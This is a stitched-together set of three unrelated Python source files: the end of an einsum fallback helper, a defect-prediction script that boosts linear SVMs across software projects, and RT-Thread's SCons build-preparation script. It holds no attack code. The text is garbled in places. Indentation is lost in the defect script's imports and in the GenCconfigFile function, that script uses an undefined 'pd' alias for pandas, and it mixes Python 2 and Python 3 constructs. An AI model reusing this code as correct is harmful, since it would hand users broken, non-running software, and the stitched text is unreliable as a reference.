    # Fully static shape: nothing to query at run time.
    return static_shape
  # Fall back to the dynamic shape for the unknown entries only.
  dynamic_shape = array_ops.shape(tensor)
  return [dim if dim is not None else dynamic_shape[i]
          for i, dim in enumerate(static_shape)]
def _total_size(shape_values):
  """Given list of tensor shape values, returns total size.
  If shape_values contains tensor values (which are results of
  array_ops.shape), then it returns a scalar tensor.
  If not, it returns an integer."""
  # Empty input yields 1 (the multiplicative identity), matching the
  # convention that the product over the empty set is one.
  product = 1
  for dim in shape_values:
    product = product * dim
  return product
def _exponential_space_einsum(equation, *inputs):
  """Fallback implementation that supports summing an index over > 2 inputs.

  Expands every input to the full joint index space (hence "exponential
  space"), multiplies them element-wise with broadcasting, and then sums
  out the non-output axes in a single reduce_sum.
  """
  if '...' in equation:
    raise ValueError('Subscripts with ellipses are not yet supported.')
  match = re.match('^([a-zA-Z,]+)(->[a-zA-Z]*)?$', equation)
  if not match:
    raise ValueError('Indices have incorrect format: %s' % equation)
  inputs = list(inputs)
  idx_in = match.group(1).split(',')
  idx_all = set(''.join(idx_in))
  indices = ''.join(sorted(idx_all))
  if match.group(2):
    idx_out = match.group(2)[2:]
  else:
    # infer the output subscripts if not given, assume alphabetical order:
    # indices appearing in exactly one input survive to the output.
    counts = {ax: 0 for ax in indices}
    for axes_ in idx_in:
      for ax in axes_:
        counts[ax] += 1
    idx_out = ''.join(sorted(ax for ax in indices if counts[ax] == 1))
  if len(idx_in) != len(inputs):
    raise ValueError('Expected %d inputs but got %d' % (len(idx_in),
                                                        len(inputs)))
  missing_idx = set(idx_out).difference(idx_all)
  if missing_idx:
    raise ValueError('Unknown output axes: %s' % missing_idx)
  # Summed (non-output) axes are ordered before output axes so that one
  # trailing reduce_sum can drop them all.
  axis_order = {}
  for ax in indices:
    if ax not in idx_out:
      axis_order[ax] = len(axis_order)
  for ax in idx_out:
    axis_order[ax] = len(axis_order)
  # transpose inputs so axes are in order
  for i, (input_, axes_) in enumerate(zip(inputs, idx_in)):
    if input_.get_shape().ndims != len(axes_):
      raise ValueError(
          'Input %d with axes %s has incorrect' \
          ' number of dimensions (expected %d, got %d)' % (
              i, axes_, len(axes_), input_.get_shape().ndims
          )
      )
    sorted_idx = sorted(axes_, key=axis_order.get)
    if len(set(axes_)) != len(axes_):
      raise ValueError(
          'Subscript not supported: an axis appears more than once: %s' % axes_)
    if list(axes_) != sorted_idx:
      permuted = [axes_.find(ax) for ax in sorted_idx]
      inputs[i] = array_ops.transpose(input_, permuted)
      idx_in[i] = sorted_idx
  reduction_idx = []
  # Unknown (None) static dims become -1 so reshape infers them.
  shapes = [[dim if dim else -1
             for dim in tensor.get_shape().as_list()]
            for tensor in inputs]
  # validate shapes for broadcasting: insert size-1 axes where an input
  # lacks an index, and require all known sizes > 1 to agree.
  for j, ax in enumerate(sorted(idx_all, key=axis_order.get)):
    dims = []
    for i, idx in enumerate(idx_in):
      if ax not in idx:
        shapes[i].insert(j, 1)
      else:
        dim = shapes[i][j]
        if isinstance(dim, int) and dim > 1:
          dims.append(dim)
    if len(set(dims)) > 1:
      raise ValueError('Dimension mismatch on axis: %s' % ax)
    if ax not in idx_out:
      reduction_idx.append(j)
  # reshape, multiply
  expanded_inputs = [
      array_ops.reshape(input_, shape) for input_, shape in zip(inputs, shapes)
  ]
  expanded_output = 1
  for input_ in expanded_inputs:
    expanded_output *= input_
  # contract
  return math_ops.reduce_sum(expanded_output, reduction_idx)
|
|
from __future__ import print_function, division
import os
import sys
root = os.path.join(os.getcwd().split('src')[0], 'src/defects')
if root not in sys.path:
sys.path.append(root)
from prediction.model import nbayes, rf_model0
from py_weka.classifier import classify
from utils import *
from metrics.abcd import abcd
from metrics.recall_vs_loc import get_curve
from pdb import set_trace
import numpy as np
from collections import Counter
import pandas
from plot.effort_plot import effort_plot
from tabulate import tabulate
from random import random as rand, choice
from sklearn.svm import LinearSVC
from sklearn.metrics import roc_auc_score
def target_details(test_set):
    """Return the per-feature (min, max) value ranges of the test set.

    The last column (the class label) is excluded; only feature columns
    contribute to the ranges.
    """
    features = test_set[test_set.columns[:-1]]
    return features.min().values, features.max().values
def get_weights(train_set, maxs, mins):
    """Weight each training row by how similar it is to the target data.

    The weight is the fraction of a row's feature values that fall inside
    the target feature ranges ``[min, max)``.

    Parameters
    ----------
    train_set : pandas.DataFrame
        Training data; the last column is the class label.
    maxs, mins : array-like
        Per-feature upper/lower bounds taken from the test (target) set.

    Returns
    -------
    list of (ndarray, float)
        Each row's raw values paired with its similarity weight in [0, 1].
    """
    n_features = len(train_set.columns[:-1])
    s_i = []
    # range()/.iloc replace the Python-2-only xrange and the long-removed
    # DataFrame.ix indexer (positional access over 0..len-1 is unchanged).
    for i in range(len(train_set)):
        row = train_set.iloc[i].values
        in_range = np.sum([1 if lo <= val < hi else 0
                           for lo, val, hi in zip(mins, row[:-1], maxs)])
        s_i.append((row, in_range / n_features))
    return s_i
def svm_train(samples):
    """Placeholder for a standalone SVM training routine (not implemented).

    Always returns None; the actual SVM fitting happens inline in
    weight_training().
    """
    return None
def weight_training(train, test, verbose=False):
    """Train a boosted ensemble of linear SVMs on similarity-weighted data.

    Rows of *train* are weighted by how well they fall inside the feature
    ranges of *test* (see get_weights), the most-similar 3/5 are used for
    training and the rest for validation, and up to 5 AdaBoost-style
    iterations of LinearSVC models are fitted on resampled, weighted data.

    Returns
    -------
    (trn_best, a_best, h)
        The weighted training frame, ensemble weights, and the list of all
        fitted classifiers from the best-scoring iteration.
    """
    def train_validation_split():
        """ Split training data into X_train and X_validation"""
        # Most-similar rows (largest weight) go to training.
        sorted_train = sorted(train_w, key=lambda x: x[1], reverse=True)
        N = len(sorted_train)
        train0, validation = sorted_train[int(N * 2 / 5):], sorted_train[:int(N * 2 / 5)]
        return train0, validation
    def multiply_dframe(dframe, weight):
        # Scale every feature column of a row by that row's weight; the
        # label column is copied through unchanged.
        assert len(weight) == len(dframe)
        N = len(dframe.columns) - 1
        wt_array = pd.DataFrame(np.array(N * [weight]).T, columns=dframe.columns[:-1])
        new_dframe = dframe.multiply(wt_array)
        new_dframe[dframe.columns[-1]] = dframe[dframe.columns[-1]]
        return new_dframe[dframe.columns]
    def ensemble_measure(lst, classifiers, weigths):
        # AUC of the (weighted) ensemble on the validation rows.
        def norm_lst(lst):
            import numpy as np
            s = np.sum(lst)
            arr = np.array(lst) / s
            return arr
        tst = pd.DataFrame([t[0] for t in lst], columns=train.columns)
        X = tst[tst.columns[:-1]]
        y = tst[tst.columns[-1]]
        y_hat = []
        y_pred = []
        for clf in classifiers:
            y_hat.append(clf.decision_function(X))
        if len(y_hat) == 1:
            # NOTE(review): `is "T"` is an identity test against a string
            # literal; it relies on CPython interning — confirm and prefer ==.
            y = [1 if p is "T" else -1 for p in y]
            auc = roc_auc_score(y, y_hat[0])
        else:
            for pred, wgt in zip(y_hat, norm_lst(weigths)):
                y_pred.append([wgt * p for p in pred])
            y_pred = np.sum(np.array(y_pred).T, axis=1)
            y = [1 if p is "T" else -1 for p in y]
            auc = roc_auc_score(y, y_pred)
        return auc
    def resample(train0, weights):
        """ The name says it all; resample training set"""
        def oversample(lst):
            # SMOTE-like synthesis: interpolate between three random members.
            new_lst = []
            while len(new_lst) < N:
                # set_trace()
                a = choice(lst)
                b = choice(lst)
                c = choice(lst)
                r = rand()
                new = [x + r * (y - z) for x, y, z in zip(a[0][0][:-1], b[0][0][:-1], c[0][0][:-1])] + [a[0][0][-1]]
                new_lst.append(((new, (a[0][1] + b[0][1] + c[0][1]) / 3), a[1] + r * (b[1] - c[1])))
            return new_lst
        def undersample(lst):
            # Sample with replacement; xrange is Python-2 only.
            return [choice(lst) for _ in xrange(len(lst))]
        klass = [t[0][-1] for t in train0]
        count = Counter(klass)
        # set_trace()
        [major, minor] = sorted(count)[::-1]
        N = int(0.5 * (count[minor] + count[major]))
        oversamp = []
        undersmp = []
        therest = []
        w_cutoff = np.median(weights)
        # NOTE(review): both if/else pairs append to therest, so a row not
        # selected by either branch lands in therest twice — confirm intent.
        for w, b in zip(weights, train0):
            if b[1] <= w_cutoff and b[0][-1] is minor:
                oversamp.append((b, w))
            else:
                therest.append((b, w))
            if b[1] >= w_cutoff and b[0][-1] is major:
                undersmp.append((b, w))
            else:
                therest.append((b, w))
        try:
            therest.extend(undersample(undersmp))
            therest.extend(oversample(oversamp))
        except:
            pass
        weights = [t[1] for t in therest]
        therest = [t[0] for t in therest]
        return therest, weights
    lo, hi = target_details(test)
    train_w = get_weights(train, hi, lo)
    train0, validation = train_validation_split()
    rho_best = 0
    h = []  # fitted classifiers, one per boosting round
    a_m = []  # per-round ensemble weights (log-odds of the error)
    lam = 0.5  # Penalty for each iteration
    train1 = train0
    w = len(train1) * [1]
    a_best = a_m
    trn_best = train1
    for iter in xrange(5):
        if verbose: print("Interation number: {}".format(iter))
        train1, w = resample(train1, w)
        sim = [t[1] for t in train1]
        try:trn = pd.DataFrame([t[0] for t in train1], columns=train.columns)
        except:trn = pd.DataFrame([t for t in train1], columns=train.columns)
        w_trn = multiply_dframe(trn, w)
        # Create an SVM model
        X = w_trn[w_trn.columns[:-1]]
        y = w_trn[w_trn.columns[-1]]
        clf = LinearSVC()
        clf.fit(X, y)
        h.append(clf)
        y_prd = h[-1].predict(X)
        # Weighted training error of this round's classifier.
        e_m = np.sum([w0 if not y_hat == y_act else 0 for w0, y_hat, y_act in zip(w, y_prd, y)]) / np.sum(
            w)
        a_m.append(lam * np.log((1 - e_m) / (e_m)))
        # Up-weight misclassified rows for the next round (AdaBoost update).
        w = [w0 * np.exp(a_m[-1]) if not y_hat == y_act else w0 for w0, y_hat, y_act in zip(w, y_prd, y)]
        p_m = ensemble_measure(validation, h, a_m)
        if p_m >= rho_best:
            if verbose: print("Found better Rho. Previously: {0:.2f} | Now: {1:.2f}".format(rho_best, p_m))
            rho_best = p_m
            a_best = a_m
            trn_best = w_trn
    if verbose: print("Boosting terminated. Best Rho={}".format(rho_best))
    return trn_best, a_best, h
def predict_defects(test, weights, classifiers):
    """Predict defect labels for *test* with a (weighted) classifier ensemble.

    Parameters
    ----------
    test : pandas.DataFrame
        Test data; the last column is the class label.
    weights : list
        Ensemble weights, one per classifier (used when there is more than
        one classifier).
    classifiers : list
        Fitted classifiers exposing ``decision_function``.

    Returns
    -------
    (actuals, predicted, distribution)
        Binary ground truth, binary predictions, and the raw (weighted)
        decision-function scores.
    """
    def norm_lst(lst):
        # Normalize the ensemble weights so they sum to 1.
        return np.array(lst) / np.sum(lst)

    X = test[test.columns[:-1]]
    y = test[test.columns[-1]]
    y_hat = []
    y_pred = []
    for clf in classifiers:
        y_hat.append(clf.decision_function(X))
    if len(y_hat) == 1:
        actuals = [1 if p > 0 else 0 for p in y]
        distribution = y_hat[0]
        predicted = [1 if p > 0 else 0 for p in distribution]
    else:
        for pred, wgt in zip(y_hat, norm_lst(weights)):
            y_pred.append([wgt * p for p in pred])
        distribution = np.sum(np.array(y_pred).T, axis=1)
        # '==' replaces the original identity test `p is "T"`, which relied
        # on CPython string interning and is unreliable for runtime data.
        actuals = [1 if p == "T" else 0 for p in y]
        predicted = [1 if p > 0 else 0 for p in distribution]
    return actuals, predicted, distribution
def vcb(source, target, n_rep=12):
    """Cross-project defect prediction with the boosted-SVM transfer learner.

    For every target project, trains on every *other* source project
    (via weight_training), predicts defects on the target, and tabulates
    Pd/Pf/AUC statistics over ``n_rep`` repeats.

    :param source: dict-like mapping project name -> project (with .data paths)
    :param target: dict-like mapping project name -> project (with .data paths)
    :param n_rep: number of repeats
    :return: dict mapping target name -> pandas.DataFrame of statistics

    NOTE(review): ``iteritems``/``xrange`` make this Python-2 only.
    """
    result = dict()
    plot_data = [("Xalan", "Log4j", "Lucene", "Poi", "Velocity")]
    for tgt_name, tgt_path in target.iteritems():
        stats = []
        charts = []
        print("{}  \r".format(tgt_name[0].upper() + tgt_name[1:]))
        val = []
        for src_name, src_path in source.iteritems():
            # Skip self-prediction: only transfer across different projects.
            if not src_name == tgt_name:
                # print("{}  \r".format(src_name[0].upper() + src_name[1:]))
                src = list2dataframe(src_path.data)
                tgt = list2dataframe(tgt_path.data)
                # Caution: this local `pd` (probability of detection list)
                # shadows any pandas alias inside this loop body; the
                # DataFrame below is built via the `pandas` module name.
                pd, pf, g, auc = [], [], [], []
                for _ in xrange(n_rep):
                    _train, clf_w, classifiers = weight_training(train=src, test=tgt)
                    actual, predicted, distribution = predict_defects(tgt, clf_w, classifiers)
                    # loc = tgt["$loc"].values
                    # loc = loc * 100 / np.max(loc)
                    # recall, loc, au_roc = get_curve(loc, actual, predicted, distribution)
                    # effort_plot(recall, loc,
                    #             save_dest=os.path.abspath(os.path.join(root, "plot", "plots", tgt_name)),
                    #             save_name=src_name)
                    p_d, p_f, p_r, rc, f_1, e_d, _g, auroc = abcd(actual, predicted, distribution)
                    pd.append(p_d)
                    pf.append(p_f)
                    g.append(e_d)
                    auc.append(int(auroc))
                stats.append([src_name, int(np.mean(pd)), int(np.std(pd)),
                              int(np.mean(pf)), int(np.std(pf)),
                              int(np.mean(auc)), int(np.std(auc))])
        stats = pandas.DataFrame(sorted(stats, key=lambda lst: lst[-2], reverse=True),  # Sort by G Score
                                 columns=["Name", "Pd (Mean)", "Pd (Std)",
                                          "Pf (Mean)", "Pf (Std)",
                                          "AUC (Mean)", "AUC (Std)"])  # ,
        # "G (Mean)", "G (Std)"])
        print(tabulate(stats,
                       headers=["Name", "Pd (Mean)", "Pd (Std)",
                                "Pf (Mean)", "Pf (Std)",
                                "AUC (Mean)", "AUC (Std)"],
                       showindex="never",
                       tablefmt="fancy_grid"))
        result.update({tgt_name: stats})
    return result
def tnb_jur():
    """Run the VCB transfer learner over all Apache project pairs (1 repeat)."""
    from data.handler import get_all_projects
    projects = get_all_projects()
    apache_projects = projects["Apache"]
    return vcb(apache_projects, apache_projects, n_rep=1)
if __name__ == "__main__":
    # Script entry point: run the Apache-to-Apache transfer experiment.
    tnb_jur()
|
|
#
# File : building.py
# This file is part of RT-Thread RTOS
# COPYRIGHT (C) 2006 - 2015, RT-Thread Development Team
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Change Logs:
# Date Author Notes
# 2015-01-20 Bernard Add copyright information
# 2015-07-25 Bernard Add LOCAL_CCFLAGS/LOCAL_CPPPATH/LOCAL_CPPDEFINES for
# group definition.
#
import os
import sys
import string
import utils
from SCons.Script import *
from utils import _make_path_relative
from mkdist import do_copy_file
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
# SCons PreProcessor patch
def start_handling_includes(self, t=None):
    """
    Causes the PreProcessor object to start processing #import,
    #include and #include_next lines.
    This method will be called when a #if, #ifdef, #ifndef or #elif
    evaluates True, or when we reach the #else in a #if, #ifdef,
    #ifndef or #elif block where a condition already evaluated
    False.
    """
    # Restore the directive handlers from the innermost conditional frame,
    # or from the default table when no conditional block is open.
    table = self.stack[-1] if self.stack else self.default_table
    dispatch = self.dispatch_table
    for directive in ('import', 'include', 'include_next', 'define'):
        dispatch[directive] = table[directive]
def stop_handling_includes(self, t=None):
    """
    Causes the PreProcessor object to stop processing #import,
    #include and #include_next lines.
    This method will be called when a #if, #ifdef, #ifndef or #elif
    evaluates False, or when we reach the #else in a #if, #ifdef,
    #ifndef or #elif block where a condition already evaluated True.
    """
    # Route every include-like directive (and #define) to the no-op handler
    # while inside an inactive conditional-compilation branch.
    dispatch = self.dispatch_table
    for directive in ('import', 'include', 'include_next', 'define'):
        dispatch[directive] = self.do_nothing
# Install the patched include handlers. NOTE: the alias below is the SCons
# class itself, so this mutates SCons.cpp.PreProcessor globally rather than
# creating a subclass.
PatchedPreProcessor = SCons.cpp.PreProcessor
PatchedPreProcessor.start_handling_includes = start_handling_includes
PatchedPreProcessor.stop_handling_includes = stop_handling_includes
class Win32Spawn:
    """Replacement command spawner for SCons on Windows.

    Handles the cmd.exe built-in 'del' directly (it cannot be launched via
    subprocess.Popen) and temporarily adopts the build environment's PATH so
    CreateProcess can locate toolchain executables.
    """
    def spawn(self, sh, escape, cmd, args, env):
        """Run *cmd* with *args* under *env*; return the exit code (0 = ok)."""
        # deal with the cmd build-in commands which cannot be used in
        # subprocess.Popen
        if cmd == 'del':
            for f in args[1:]:
                try:
                    os.remove(f)
                except Exception as e:
                    # str(e) is required: concatenating the exception object
                    # itself raises TypeError on Python 3.
                    print('Error removing file: ' + str(e))
                    return -1
            return 0
        import subprocess
        newargs = ' '.join(args[1:])
        cmdline = cmd + " " + newargs
        # Make sure the env is constructed by strings
        _e = dict([(k, str(v)) for k, v in env.items()])
        # Windows(tm) CreateProcess does not use the env passed to it to find
        # the executables. So we have to modify our own PATH to make Popen
        # work.
        old_path = os.environ['PATH']
        os.environ['PATH'] = _e['PATH']
        try:
            proc = subprocess.Popen(cmdline, env=_e, shell=False)
        except Exception as e:
            print('Error in calling command:' + cmdline.split(' ')[0])
            print('Exception: ' + os.strerror(e.errno))
            if (os.strerror(e.errno) == "No such file or directory"):
                print("\nPlease check Toolchains PATH setting.\n")
            return e.errno
        finally:
            # Always restore the original PATH, even if Popen raised.
            os.environ['PATH'] = old_path
        return proc.wait()
# generate cconfig.h file
def GenCconfigFile(env, BuildOptions):
import rtconfig
if rtconfig.PLATFORM == 'gcc':
contents = ''
if not os.path.isfile('cconfig.h'):
import gcc
gcc.GenerateGCCConfig(rtconfig)
# try again
if os.path.isfile('cconfig.h'):
f = open('cconfig.h', 'r')
if f:
contents = f.read()
f.close()
prep = PatchedPreProcessor()
prep.process_contents(contents)
options = prep.cpp_namespace
BuildOptions.update(options)
# add HAVE_CCONFIG_H definition
env.AppendUnique(CPPDEFINES = ['HAVE_CCONFIG_H'])
def PrepareBuilding(env, root_directory, has_libcpu=False, remove_components = []):
    """Prepare the SCons build environment for an RT-Thread BSP.

    Registers all RT-Thread command-line options, configures the toolchain
    and platform from rtconfig, parses rtconfig.h into the global
    BuildOptions namespace, and loads the BSP, kernel, libcpu and
    components SConscripts.

    :param env: SCons Environment to configure (stored in the global Env).
    :param root_directory: RT-Thread root path (stored in global Rtt_Root).
    :param has_libcpu: when True, skip the shared libcpu SConscript.
    :param remove_components: component names to exclude; forwarded to the
        components SConscript via ``exports``.
        NOTE(review): mutable default argument — appears to be only read
        and exported here, not mutated; confirm no caller relies on that.
    :return: list of build objects collected from all SConscripts.
    """
    import rtconfig

    global BuildOptions
    global Projects
    global Env
    global Rtt_Root

    # ===== Add option to SCons =====
    AddOption('--dist',
              dest = 'make-dist',
              action = 'store_true',
              default = False,
              help = 'make distribution')
    AddOption('--dist-strip',
              dest = 'make-dist-strip',
              action = 'store_true',
              default = False,
              help = 'make distribution and strip useless files')
    AddOption('--dist-ide',
              dest = 'make-dist-ide',
              action = 'store_true',
              default = False,
              help = 'make distribution for RT-Thread Studio IDE')
    AddOption('--project-path',
              dest = 'project-path',
              type = 'string',
              default = None,
              help = 'set dist-ide project output path')
    AddOption('--project-name',
              dest = 'project-name',
              type = 'string',
              default = None,
              help = 'set project name')
    AddOption('--reset-project-config',
              dest = 'reset-project-config',
              action = 'store_true',
              default = False,
              help = 'reset the project configurations to default')
    AddOption('--cscope',
              dest = 'cscope',
              action = 'store_true',
              default = False,
              help = 'Build Cscope cross reference database. Requires cscope installed.')
    AddOption('--clang-analyzer',
              dest = 'clang-analyzer',
              action = 'store_true',
              default = False,
              help = 'Perform static analyze with Clang-analyzer. ' + \
                   'Requires Clang installed.\n' + \
                   'It is recommended to use with scan-build like this:\n' + \
                   '`scan-build scons --clang-analyzer`\n' + \
                   'If things goes well, scan-build will instruct you to invoke scan-view.')
    AddOption('--buildlib',
              dest = 'buildlib',
              type = 'string',
              help = 'building library of a component')
    AddOption('--cleanlib',
              dest = 'cleanlib',
              action = 'store_true',
              default = False,
              help = 'clean up the library by --buildlib')
    AddOption('--target',
              dest = 'target',
              type = 'string',
              help = 'set target project: mdk/mdk4/mdk5/iar/vs/vsc/ua/cdk/ses/makefile/eclipse')
    AddOption('--genconfig',
              dest = 'genconfig',
              action = 'store_true',
              default = False,
              help = 'Generate .config from rtconfig.h')
    AddOption('--useconfig',
              dest = 'useconfig',
              type = 'string',
              help = 'make rtconfig.h from config file.')
    AddOption('--verbose',
              dest = 'verbose',
              action = 'store_true',
              default = False,
              help = 'print verbose information during build')

    Env = env
    Rtt_Root = os.path.abspath(root_directory)

    # make an absolute root directory
    RTT_ROOT = Rtt_Root
    Export('RTT_ROOT')

    # set RTT_ROOT in ENV
    Env['RTT_ROOT'] = Rtt_Root
    # set BSP_ROOT in ENV
    Env['BSP_ROOT'] = Dir('#').abspath

    # make the RT-Thread tools importable (keil.py, iar.py, mkdist.py, ...)
    sys.path = sys.path + [os.path.join(Rtt_Root, 'tools')]

    # {target_name:(CROSS_TOOL, PLATFORM)}
    tgt_dict = {'mdk':('keil', 'armcc'),
                'mdk4':('keil', 'armcc'),
                'mdk5':('keil', 'armcc'),
                'iar':('iar', 'iar'),
                'vs':('msvc', 'cl'),
                'vs2012':('msvc', 'cl'),
                'vsc' : ('gcc', 'gcc'),
                'cb':('keil', 'armcc'),
                'ua':('gcc', 'gcc'),
                'cdk':('gcc', 'gcc'),
                'makefile':('gcc', 'gcc'),
                'eclipse':('gcc', 'gcc'),
                'ses' : ('gcc', 'gcc')}
    tgt_name = GetOption('target')

    if tgt_name:
        # --target will change the toolchain settings which clang-analyzer is
        # depend on
        if GetOption('clang-analyzer'):
            print ('--clang-analyzer cannot be used with --target')
            sys.exit(1)

        # project generation only — do not actually compile anything
        SetOption('no_exec', 1)
        try:
            rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
            # replace the 'RTT_CC' to 'CROSS_TOOL'
            os.environ['RTT_CC'] = rtconfig.CROSS_TOOL
            utils.ReloadModule(rtconfig)
        except KeyError:
            print ('Unknow target: '+ tgt_name+'. Avaible targets: ' +', '.join(tgt_dict.keys()))
            sys.exit(1)
    elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
        and rtconfig.PLATFORM == 'gcc':
        # NOTE(review): GetDepend reads the global BuildOptions, but
        # rtconfig.h is only parsed further below — confirm this relies on
        # BuildOptions having been populated by an earlier run/import.
        AddDepend('RT_USING_MINILIBC')

    # auto change the 'RTT_EXEC_PATH' when 'rtconfig.EXEC_PATH' get failed
    if not os.path.exists(rtconfig.EXEC_PATH):
        if 'RTT_EXEC_PATH' in os.environ:
            # del the 'RTT_EXEC_PATH' and using the 'EXEC_PATH' setting on rtconfig.py
            del os.environ['RTT_EXEC_PATH']
            utils.ReloadModule(rtconfig)

    # add compability with Keil MDK 4.6 which changes the directory of armcc.exe
    if rtconfig.PLATFORM == 'armcc' or rtconfig.PLATFORM == 'armclang':
        if rtconfig.PLATFORM == 'armcc' and not os.path.isfile(os.path.join(rtconfig.EXEC_PATH, 'armcc.exe')):
            if rtconfig.EXEC_PATH.find('bin40') > 0:
                rtconfig.EXEC_PATH = rtconfig.EXEC_PATH.replace('bin40', 'armcc/bin')
                Env['LINKFLAGS'] = Env['LINKFLAGS'].replace('RV31', 'armcc')

        # reset AR command flags
        env['ARCOM'] = '$AR --create $TARGET $SOURCES'
        env['LIBPREFIX'] = ''
        env['LIBSUFFIX'] = '.lib'
        env['LIBLINKPREFIX'] = ''
        env['LIBLINKSUFFIX'] = '.lib'
        env['LIBDIRPREFIX'] = '--userlibpath '
    elif rtconfig.PLATFORM == 'iar':
        env['LIBPREFIX'] = ''
        env['LIBSUFFIX'] = '.a'
        env['LIBLINKPREFIX'] = ''
        env['LIBLINKSUFFIX'] = '.a'
        env['LIBDIRPREFIX'] = '--search '

    # patch for win32 spawn
    if env['PLATFORM'] == 'win32':
        win32_spawn = Win32Spawn()
        win32_spawn.env = env
        env['SPAWN'] = win32_spawn.spawn

    if env['PLATFORM'] == 'win32':
        os.environ['PATH'] = rtconfig.EXEC_PATH + ";" + os.environ['PATH']
    else:
        os.environ['PATH'] = rtconfig.EXEC_PATH + ":" + os.environ['PATH']

    # add program path
    env.PrependENVPath('PATH', os.environ['PATH'])
    # add rtconfig.h/BSP path into Kernel group
    DefineGroup("Kernel", [], [], CPPPATH=[str(Dir('#').abspath)])

    # add library build action
    act = SCons.Action.Action(BuildLibInstallAction, 'Install compiled library... $TARGET')
    bld = Builder(action = act)
    Env.Append(BUILDERS = {'BuildLib': bld})

    # parse rtconfig.h to get used component
    PreProcessor = PatchedPreProcessor()
    f = open('rtconfig.h', 'r')
    contents = f.read()
    f.close()
    PreProcessor.process_contents(contents)
    BuildOptions = PreProcessor.cpp_namespace

    if GetOption('clang-analyzer'):
        # perform what scan-build does
        env.Replace(
                CC   = 'ccc-analyzer',
                CXX  = 'c++-analyzer',
                # skip as and link
                LINK = 'true',
                AS   = 'true',)
        env["ENV"].update(x for x in os.environ.items() if x[0].startswith("CCC_"))
        # only check, don't compile. ccc-analyzer use CCC_CC as the CC.
        # fsyntax-only will give us some additional warning messages
        env['ENV']['CCC_CC']  = 'clang'
        env.Append(CFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
        env['ENV']['CCC_CXX'] = 'clang++'
        env.Append(CXXFLAGS=['-fsyntax-only', '-Wall', '-Wno-invalid-source-encoding'])
        # remove the POST_ACTION as it will cause meaningless errors(file not
        # found or something like that).
        rtconfig.POST_ACTION = ''

    # generate cconfig.h file
    GenCconfigFile(env, BuildOptions)

    # auto append '_REENT_SMALL' when using newlib 'nano.specs' option
    if rtconfig.PLATFORM == 'gcc' and str(env['LINKFLAGS']).find('nano.specs') != -1:
        env.AppendUnique(CPPDEFINES = ['_REENT_SMALL'])

    if GetOption('genconfig'):
        from genconf import genconfig
        genconfig()
        exit(0)

    # kconfig frontends are POSIX-only, so --menuconfig is hidden on Windows
    if env['PLATFORM'] != 'win32':
        AddOption('--menuconfig',
                  dest = 'menuconfig',
                  action = 'store_true',
                  default = False,
                  help = 'make menuconfig for RT-Thread BSP')
        if GetOption('menuconfig'):
            from menuconfig import menuconfig
            menuconfig(Rtt_Root)
            exit(0)

    AddOption('--pyconfig',
              dest = 'pyconfig',
              action = 'store_true',
              default = False,
              help = 'Python GUI menuconfig for RT-Thread BSP')
    AddOption('--pyconfig-silent',
              dest = 'pyconfig_silent',
              action = 'store_true',
              default = False,
              help = 'Don`t show pyconfig window')

    if GetOption('pyconfig_silent'):
        from menuconfig import guiconfig_silent
        guiconfig_silent(Rtt_Root)
        exit(0)
    elif GetOption('pyconfig'):
        from menuconfig import guiconfig
        guiconfig(Rtt_Root)
        exit(0)

    configfn = GetOption('useconfig')
    if configfn:
        from menuconfig import mk_rtconfig
        mk_rtconfig(configfn)
        exit(0)

    if not GetOption('verbose'):
        # override the default verbose command string
        env.Replace(
            ARCOMSTR = 'AR $TARGET',
            ASCOMSTR = 'AS $TARGET',
            ASPPCOMSTR = 'AS $TARGET',
            CCCOMSTR = 'CC $TARGET',
            CXXCOMSTR = 'CXX $TARGET',
            LINKCOMSTR = 'LINK $TARGET'
        )

    # fix the linker for C++
    if GetDepend('RT_USING_CPLUSPLUS'):
        if env['LINK'].find('gcc') != -1:
            env['LINK'] = env['LINK'].replace('gcc', 'g++')

    # we need to seperate the variant_dir for BSPs and the kernels. BSPs could
    # have their own components etc. If they point to the same folder, SCons
    # would find the wrong source code to compile.
    bsp_vdir = 'build'
    kernel_vdir = 'build/kernel'
    # board build script
    objs = SConscript('SConscript', variant_dir=bsp_vdir, duplicate=0)
    # include kernel
    objs.extend(SConscript(Rtt_Root + '/src/SConscript', variant_dir=kernel_vdir + '/src', duplicate=0))
    # include libcpu
    if not has_libcpu:
        objs.extend(SConscript(Rtt_Root + '/libcpu/SConscript',
                    variant_dir=kernel_vdir + '/libcpu', duplicate=0))
    # include components
    objs.extend(SConscript(Rtt_Root + '/components/SConscript',
                           variant_dir=kernel_vdir + '/components',
                           duplicate=0,
                           exports='remove_components'))

    return objs
def PrepareModuleBuilding(env, root_directory, bsp_directory):
    """Prepare the SCons environment for building a loadable module.

    Stores *env*/*root_directory* in the globals, parses the BSP's
    rtconfig.h into BuildOptions and registers the --buildlib/--cleanlib
    options.
    """
    import rtconfig

    global BuildOptions
    global Env
    global Rtt_Root

    # patch for win32 spawn
    if env['PLATFORM'] == 'win32':
        win32_spawn = Win32Spawn()
        win32_spawn.env = env
        env['SPAWN'] = win32_spawn.spawn

    Env = env
    Rtt_Root = root_directory

    # parse bsp rtconfig.h to get used component
    PreProcessor = PatchedPreProcessor()
    # context manager so the handle is closed even if read() raises
    with open(bsp_directory + '/rtconfig.h', 'r') as f:
        contents = f.read()
    PreProcessor.process_contents(contents)
    BuildOptions = PreProcessor.cpp_namespace

    # add build/clean library option for library checking
    AddOption('--buildlib',
              dest='buildlib',
              type='string',
              help='building library of a component')
    AddOption('--cleanlib',
              dest='cleanlib',
              action='store_true',
              default=False,
              help='clean up the library by --buildlib')

    # add program path
    env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetConfigValue(name):
    """Return the value of macro *name* parsed from rtconfig.h,
    or '' when the macro is not defined.
    """
    assert type(name) == str, 'GetConfigValue: only string parameter is valid'
    try:
        return BuildOptions[name]
    except KeyError:
        # Undefined macros read as empty string. The original bare
        # `except:` also swallowed unrelated errors (e.g. NameError).
        return ''
